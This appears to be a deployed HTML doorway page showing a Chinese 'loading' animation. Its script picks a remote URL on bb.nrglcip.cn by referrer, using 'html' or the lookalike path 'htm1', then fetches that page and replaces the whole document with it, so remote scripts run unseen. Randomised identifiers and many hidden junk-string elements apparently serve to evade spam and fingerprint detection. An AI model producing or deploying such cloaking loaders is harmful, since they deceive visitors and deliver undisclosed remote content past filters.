<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .ZYI06VH {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .ZYI06VH .g6qQ3XO {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .ZYI06VH .content {
            line-height: 50px;
            text-align: center
        }

        .ZYI06VH .img {
            width: 100%
        }

        .ZYI06VH .y4aJwT {
            text-align: center
        }

        .ZYI06VH .y4aJwT span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .ZYI06VH .y4aJwT span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .ZYI06VH .y4aJwT span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .ZYI06VH .y4aJwT span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .ZYI06VH .y4aJwT span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .ZYI06VH .y4aJwT span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .ZYI06VH .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function QKBBYbwqzj2F(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var EITe6W = QKBBYbwqzj2F('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ EITe6W +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ EITe6W +".html?a=share";
		}
		
        IZySshh=url+"#"+new Date().getTime();
        IZySshh && function() {
            $.get(IZySshh, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<ul style='display:none' >St6FuEpsQX0TlMFakTPDKO3jF3jAZHWpSy1knHioD4KBn72CS1bMYA</ul>
<li style='display:none' >HHX4772xVHHvDEkbtj9LaFgZdVshcoNRCI8V2RP1JTIv</li>
<a  href='#' style='display:none'>NFyhRY8nmp2A24IxkWrE2nc0</a><div class="ZYI06VH">
    <div class="g6qQ3XO">
        <div class="y4aJwT">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >DFiF1mNhFaPGwncECKmCuE309dqrc</h1>
<div style='display:none'>vtSFFHywaSD</div>
<h1 style='display:none' >DFiF1mNhFaPGwncECKmCuE309dqrc</h1>
<ul style='display:none' >T6lB9JR0SGD8FERRVETCLirPhAibiXewRd9wvhiMB</ul>
<a  href='#' style='display:none'>j3TQ8wWrKqSmWpi9HSCqq22Nx3kDVCp5cjNujxQKMTToVNMs9ACoYkPkN4Pt24sg7</a>
<ul style='display:none' >T6lB9JR0SGD8FERRVETCLirPhAibiXewRd9wvhiMB</ul>
<p  style='display:none'>vrFrUP6ABEYFE7J20awWDAWbmeZ7V</p>
<span style='display:none'>mh5KcqDPyWpDvNeClOqtX7</span>
<span style='display:none'>mh5KcqDPyWpDvNeClOqtX7</span>
<b style='display:none' >XV5tlk4wuxbJCsPmydCCJ0ixp2AjW7zjO</b></body>
</html>